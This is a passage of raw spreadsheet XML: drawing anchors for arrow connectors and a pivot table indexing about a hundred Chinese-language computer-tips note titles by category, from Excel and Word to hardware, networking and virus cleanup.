      <xdr:colOff>577920</xdr:colOff>
      <xdr:row>20</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="24" name="直接箭头连接符 23"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="2011680" y="3802380"/>
          <a:ext cx="1980000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="00B05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22</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>539820</xdr:colOff>
      <xdr:row>22</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="25" name="直接箭头连接符 24"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="4183380"/>
          <a:ext cx="1980000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="00B05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24</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>539820</xdr:colOff>
      <xdr:row>24</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="26" name="直接箭头连接符 25"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="4564380"/>
          <a:ext cx="1980000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="00B05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26</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>539820</xdr:colOff>
      <xdr:row>26</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="27" name="直接箭头连接符 26"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="4945380"/>
          <a:ext cx="1980000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="00B05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28</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>539820</xdr:colOff>
      <xdr:row>28</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="28" name="直接箭头连接符 27"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="5326380"/>
          <a:ext cx="1980000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="00B05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16</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>6</xdr:col>
      <xdr:colOff>580620</xdr:colOff>
      <xdr:row>16</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="29" name="直接箭头连接符 28"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="3040380"/>
          <a:ext cx="3240000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>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18</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>6</xdr:col>
      <xdr:colOff>580620</xdr:colOff>
      <xdr:row>18</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="30" name="直接箭头连接符 29"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="3421380"/>
          <a:ext cx="3240000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>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20</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>6</xdr:col>
      <xdr:colOff>576000</xdr:colOff>
      <xdr:row>20</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="31" name="直接箭头连接符 30"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4632960" y="3802380"/>
          <a:ext cx="576000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>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22</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>6</xdr:col>
      <xdr:colOff>576000</xdr:colOff>
      <xdr:row>22</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="32" name="直接箭头连接符 31"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4632960" y="4183380"/>
          <a:ext cx="576000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>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24</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>6</xdr:col>
      <xdr:colOff>576000</xdr:colOff>
      <xdr:row>24</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="33" name="直接箭头连接符 32"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4632960" y="4564380"/>
          <a:ext cx="576000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>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26</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>6</xdr:col>
      <xdr:colOff>576000</xdr:colOff>
      <xdr:row>26</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="34" name="直接箭头连接符 33"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4632960" y="4945380"/>
          <a:ext cx="576000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>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32</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>539820</xdr:colOff>
      <xdr:row>32</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="35" name="直接箭头连接符 34"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="6088380"/>
          <a:ext cx="1980000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="00B05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34</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>539820</xdr:colOff>
      <xdr:row>34</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="36" name="直接箭头连接符 35"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="6469380"/>
          <a:ext cx="1980000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="00B05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36</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>539820</xdr:colOff>
      <xdr:row>36</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="37" name="直接箭头连接符 36"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="6850380"/>
          <a:ext cx="1980000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="00B05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46</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>110220</xdr:colOff>
      <xdr:row>46</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="38" name="直接箭头连接符 37"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1973580" y="8755380"/>
          <a:ext cx="2160000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>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10</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>8</xdr:col>
      <xdr:colOff>558000</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="39" name="直接箭头连接符 38"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4632960" y="1897380"/>
          <a:ext cx="2844000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="FF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12</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>8</xdr:col>
      <xdr:colOff>558000</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="40" name="直接箭头连接符 39"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4632960" y="2278380"/>
          <a:ext cx="2844000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="FF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14</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>8</xdr:col>
      <xdr:colOff>558000</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="41" name="直接箭头连接符 40"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4632960" y="2659380"/>
          <a:ext cx="2844000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="FF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20</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>8</xdr:col>
      <xdr:colOff>576000</xdr:colOff>
      <xdr:row>20</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="42" name="直接箭头连接符 41"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6918960" y="3802380"/>
          <a:ext cx="576000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="FF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28</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>8</xdr:col>
      <xdr:colOff>558000</xdr:colOff>
      <xdr:row>28</xdr:row>
      <xdr:rowOff>1588</xdr:rowOff>
    </xdr:to>
    <xdr:cxnSp macro="">
      <xdr:nvCxnSpPr>
        <xdr:cNvPr id="43" name="直接箭头连接符 42"/>
        <xdr:cNvCxnSpPr/>
      </xdr:nvCxnSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4632960" y="5326380"/>
          <a:ext cx="2844000" cy="1588"/>
        </a:xfrm>
        <a:prstGeom prst="straightConnector1">
          <a:avLst/>
        </a:prstGeom>
        <a:ln w="19050">
          <a:solidFill>
            <a:srgbClr val="FF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0</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>129540</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="45" name="图片 44"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138160" y="0"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing108.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>5996940</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>60960</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>6126480</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>190500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252460" y="60960"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing109.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>3</xdr:col>
      <xdr:colOff>83820</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>213360</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>182880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8602980" y="53340"/>
          <a:ext cx="129540" cy="12954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作者" refreshedDate="40466.370489120367" createdVersion="3" refreshedVersion="3" minRefreshableVersion="3" recordCount="113">
  <cacheSource type="worksheet">
    <worksheetSource ref="B1:C1048576" sheet="contents"/>
  </cacheSource>
  <cacheFields count="2">
    <cacheField name="Categories" numFmtId="0">
      <sharedItems containsBlank="1" count="20">
        <s v="dreamweaver"/>
        <s v="Excel"/>
        <s v="office"/>
        <s v="PC基础"/>
        <s v="tips"/>
        <s v="VF"/>
        <s v="word"/>
        <s v="光盘刻录"/>
        <s v="软件"/>
        <s v="杀、控、防、优化"/>
        <s v="数码"/>
        <s v="网络"/>
        <s v="系统安装"/>
        <s v="系统操作"/>
        <s v="硬件"/>
        <s v="帐户"/>
        <s v="CAD tips"/>
        <m/>
        <s v="技巧" u="1"/>
        <s v="软件操作" u="1"/>
      </sharedItems>
    </cacheField>
    <cacheField name="Title" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
  </cacheFields>
</pivotCacheDefinition>
</file>

<file path=xl/pivotCache/pivotCacheRecords1.xml><?xml version="1.0" encoding="utf-8"?>
<pivotCacheRecords xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" count="113">
  <r>
    <x v="0"/>
    <s v="CSS样式"/>
  </r>
  <r>
    <x v="0"/>
    <s v="HTML文档"/>
  </r>
  <r>
    <x v="0"/>
    <s v="WD table cell"/>
  </r>
  <r>
    <x v="1"/>
    <s v="Excel函数"/>
  </r>
  <r>
    <x v="1"/>
    <s v="Excel基础"/>
  </r>
  <r>
    <x v="1"/>
    <s v="数据透视表"/>
  </r>
  <r>
    <x v="1"/>
    <s v="数组公式"/>
  </r>
  <r>
    <x v="2"/>
    <s v="～$文档 是否导入未保存文档？"/>
  </r>
  <r>
    <x v="2"/>
    <s v="word Excel中的超链接"/>
  </r>
  <r>
    <x v="2"/>
    <s v="丈量字符的尺寸"/>
  </r>
  <r>
    <x v="3"/>
    <s v="Command"/>
  </r>
  <r>
    <x v="3"/>
    <s v="DOS、系统提示符、windows PE"/>
  </r>
  <r>
    <x v="3"/>
    <s v="PC基础知识点"/>
  </r>
  <r>
    <x v="3"/>
    <s v="操作系统原理"/>
  </r>
  <r>
    <x v="3"/>
    <s v="常用cmd网络命令的用法"/>
  </r>
  <r>
    <x v="3"/>
    <s v="程序和DLL文件"/>
  </r>
  <r>
    <x v="3"/>
    <s v="低格、高格、快格的区别"/>
  </r>
  <r>
    <x v="3"/>
    <s v="计算机相关单位"/>
  </r>
  <r>
    <x v="3"/>
    <s v="计算机英语缩略语"/>
  </r>
  <r>
    <x v="3"/>
    <s v="文件夹大小的显示"/>
  </r>
  <r>
    <x v="3"/>
    <s v="虚拟virtual"/>
  </r>
  <r>
    <x v="3"/>
    <s v="注册表"/>
  </r>
  <r>
    <x v="4"/>
    <s v="shortcut key"/>
  </r>
  <r>
    <x v="4"/>
    <s v="常见故障解决记录与技巧"/>
  </r>
  <r>
    <x v="4"/>
    <s v="恢复win7的quick launch"/>
  </r>
  <r>
    <x v="4"/>
    <s v="无敌删除命令"/>
  </r>
  <r>
    <x v="5"/>
    <s v="form"/>
  </r>
  <r>
    <x v="5"/>
    <s v="VF"/>
  </r>
  <r>
    <x v="5"/>
    <s v="VFP 6.0文件类型"/>
  </r>
  <r>
    <x v="5"/>
    <s v="VF数据的类型"/>
  </r>
  <r>
    <x v="5"/>
    <s v="VF主程序设计"/>
  </r>
  <r>
    <x v="5"/>
    <s v="程序设计基础"/>
  </r>
  <r>
    <x v="5"/>
    <s v="对象的属性、事件、方法"/>
  </r>
  <r>
    <x v="6"/>
    <s v="word基础"/>
  </r>
  <r>
    <x v="6"/>
    <s v="word中英文混排的技巧"/>
  </r>
  <r>
    <x v="6"/>
    <s v="保护页眉"/>
  </r>
  <r>
    <x v="6"/>
    <s v="合并多个word文档"/>
  </r>
  <r>
    <x v="6"/>
    <s v="将Word变为无所不能的播放器"/>
  </r>
  <r>
    <x v="6"/>
    <s v="实现WORD双面打印的简便方法"/>
  </r>
  <r>
    <x v="6"/>
    <s v="页面布局纵横"/>
  </r>
  <r>
    <x v="7"/>
    <s v="ISO映像文件操作"/>
  </r>
  <r>
    <x v="7"/>
    <s v="Nero Burning ROM多区段DVD刻录"/>
  </r>
  <r>
    <x v="7"/>
    <s v="打造三合一安装光盘"/>
  </r>
  <r>
    <x v="7"/>
    <s v="光盘格式其它相关"/>
  </r>
  <r>
    <x v="7"/>
    <s v="快速格式化和普通格式化有什么不同？"/>
  </r>
  <r>
    <x v="7"/>
    <s v="如何读取损坏光盘中的文件"/>
  </r>
  <r>
    <x v="8"/>
    <s v="Delphi "/>
  </r>
  <r>
    <x v="8"/>
    <s v="Microsoft office软件包"/>
  </r>
  <r>
    <x v="8"/>
    <s v="microsoft visual studio软件包"/>
  </r>
  <r>
    <x v="8"/>
    <s v="MS操作系统各版本介绍"/>
  </r>
  <r>
    <x v="8"/>
    <s v="Windows Live 软件包"/>
  </r>
  <r>
    <x v="8"/>
    <s v="极点五笔"/>
  </r>
  <r>
    <x v="8"/>
    <s v="驱动(driver)"/>
  </r>
  <r>
    <x v="8"/>
    <s v="软件工具分类"/>
  </r>
  <r>
    <x v="8"/>
    <s v="软件是如何被破解的"/>
  </r>
  <r>
    <x v="8"/>
    <s v="软件下载、安装、运行、卸载"/>
  </r>
  <r>
    <x v="8"/>
    <s v="系统工具小软件"/>
  </r>
  <r>
    <x v="9"/>
    <s v="ARP欺骗与防止"/>
  </r>
  <r>
    <x v="9"/>
    <s v="病毒修复、删除、隔离"/>
  </r>
  <r>
    <x v="9"/>
    <s v="电脑不启动故障诊治全攻略"/>
  </r>
  <r>
    <x v="9"/>
    <s v="电脑死机原因种种"/>
  </r>
  <r>
    <x v="9"/>
    <s v="防火墙"/>
  </r>
  <r>
    <x v="9"/>
    <s v="计算机十二种常用密码破解法"/>
  </r>
  <r>
    <x v="9"/>
    <s v="蓝屏并自动分析可能故障原因"/>
  </r>
  <r>
    <x v="9"/>
    <s v="杀毒软件如何辨忠奸"/>
  </r>
  <r>
    <x v="9"/>
    <s v="什么情况下适合修复系统而不是重装"/>
  </r>
  <r>
    <x v="9"/>
    <s v="是否有毒最关注的三大件"/>
  </r>
  <r>
    <x v="9"/>
    <s v="网络的安全性"/>
  </r>
  <r>
    <x v="9"/>
    <s v="系统瘦身和清理"/>
  </r>
  <r>
    <x v="9"/>
    <s v="硬盘分区、数据丢失、恢复的经历"/>
  </r>
  <r>
    <x v="9"/>
    <s v="在纯DOS模式下杀毒"/>
  </r>
  <r>
    <x v="10"/>
    <s v="手机里暗藏的十大秘密"/>
  </r>
  <r>
    <x v="11"/>
    <s v="Internet connection diagram"/>
  </r>
  <r>
    <x v="11"/>
    <s v="Modem网络连接"/>
  </r>
  <r>
    <x v="11"/>
    <s v="windows7 宽带自动连接"/>
  </r>
  <r>
    <x v="11"/>
    <s v="宽带路由器设置"/>
  </r>
  <r>
    <x v="11"/>
    <s v="远程控制：远程桌面和远程协助"/>
  </r>
  <r>
    <x v="12"/>
    <s v="Windows轻松传送"/>
  </r>
  <r>
    <x v="12"/>
    <s v="XP安装"/>
  </r>
  <r>
    <x v="12"/>
    <s v="可启动光盘 硬盘 恢复盘 启动盘"/>
  </r>
  <r>
    <x v="12"/>
    <s v="双系统启动顺序"/>
  </r>
  <r>
    <x v="12"/>
    <s v="系统安装明细"/>
  </r>
  <r>
    <x v="12"/>
    <s v="雨林木风 WinXP SP2 安装"/>
  </r>
  <r>
    <x v="13"/>
    <s v="windows系统内容"/>
  </r>
  <r>
    <x v="13"/>
    <s v="windows系统内容路径"/>
  </r>
  <r>
    <x v="13"/>
    <s v="定时自动开关机"/>
  </r>
  <r>
    <x v="13"/>
    <s v="黑客必学的六条系统命令"/>
  </r>
  <r>
    <x v="13"/>
    <s v="计划任务程序"/>
  </r>
  <r>
    <x v="13"/>
    <s v="文件关联、默认程序、打开方式"/>
  </r>
  <r>
    <x v="14"/>
    <s v="CPU"/>
  </r>
  <r>
    <x v="14"/>
    <s v="HP Pavilion dv2623"/>
  </r>
  <r>
    <x v="14"/>
    <s v="传真机"/>
  </r>
  <r>
    <x v="14"/>
    <s v="打印机"/>
  </r>
  <r>
    <x v="14"/>
    <s v="电脑硬件组装"/>
  </r>
  <r>
    <x v="14"/>
    <s v="电脑硬件组装图"/>
  </r>
  <r>
    <x v="14"/>
    <s v="复印机"/>
  </r>
  <r>
    <x v="14"/>
    <s v="光驱"/>
  </r>
  <r>
    <x v="14"/>
    <s v="硅胶和导热硅脂"/>
  </r>
  <r>
    <x v="14"/>
    <s v="内存"/>
  </r>
  <r>
    <x v="14"/>
    <s v="扫描仪和UPS"/>
  </r>
  <r>
    <x v="14"/>
    <s v="网络硬件"/>
  </r>
  <r>
    <x v="14"/>
    <s v="显卡"/>
  </r>
  <r>
    <x v="14"/>
    <s v="显示器"/>
  </r>
  <r>
    <x v="14"/>
    <s v="硬盘"/>
  </r>
  <r>
    <x v="14"/>
    <s v="主板"/>
  </r>
  <r>
    <x v="15"/>
    <s v="ABC帐户只能在规定时间内登录"/>
  </r>
  <r>
    <x v="15"/>
    <s v="禁止特定软件在另外一个帐户中运行"/>
  </r>
  <r>
    <x v="15"/>
    <s v="忘记自动登录密码"/>
  </r>
  <r>
    <x v="15"/>
    <s v="修改注册表激活Administrator帐户"/>
  </r>
  <r>
    <x v="15"/>
    <s v="帐户基础"/>
  </r>
  <r>
    <x v="15"/>
    <s v="自动登录帐户"/>
  </r>
  <r>
    <x v="16"/>
    <s v="CAD tips"/>
  </r>
  <r>
    <x v="1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pplyNumberFormats="0" applyBorderFormats="0" applyFontFormats="0" applyPatternFormats="0" applyAlignmentFormats="0" applyWidthHeightFormats="1" dataCaption="值" updatedVersion="3" minRefreshableVersion="3" showCalcMbrs="0" useAutoFormatting="1" itemPrintTitles="1" createdVersion="3" indent="0" outline="1" outlineData="1" multipleFieldFilters="0">
  <location ref="B1:C20" firstHeaderRow="1" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="2">
    <pivotField axis="axisRow" showAll="0">
      <items count="21">
        <item x="0"/>
        <item x="1"/>
        <item x="2"/>
        <item x="3"/>
        <item x="5"/>
        <item x="6"/>
        <item x="7"/>
        <item m="1" x="18"/>
        <item m="1" x="19"/>
        <item x="9"/>
        <item x="10"/>
        <item x="11"/>
        <item x="12"/>
        <item x="13"/>
        <item x="14"/>
        <item x="15"/>
        <item x="17"/>
        <item x="4"/>
        <item x="8"/>
        <item x="16"/>
        <item t="default"/>
      </items>
    </pivotField>
    <pivotField dataField="1" showAll="0"/>
  </pivotFields>
  <rowFields count="1">
    <field x="0"/>
  </rowFields>
  <rowItems count="19">
    <i>
      <x/>
    </i>
    <i>
      <x v="1"/>
    </i>
    <i>
      <x v="2"/>
    </i>
    <i>
      <x v="3"/>
    </i>
    <i>
      <x v="4"/>
    </i>
    <i>
      <x v="5"/>
    </i>
    <i>
      <x v="6"/>
    </i>
    <i>
      <x v="9"/>
    </i>
    <i>
      <x v="10"/>
    </i>
    <i>
      <x v="11"/>
    </i>
    <i>
      <x v="12"/>
    </i>
    <i>
      <x v="13"/>
    </i>
    <i>
      <x v="14"/>
    </i>
    <i>
      <x v="15"/>
    </i>
    <i>
      <x v="16"/>
    </i>
    <i>
      <x v="17"/>
    </i>
    <i>
      <x v="18"/>
    </i>
    <i>
      <x v="19"/>
    </i>
    <i t="grand">
      <x/>
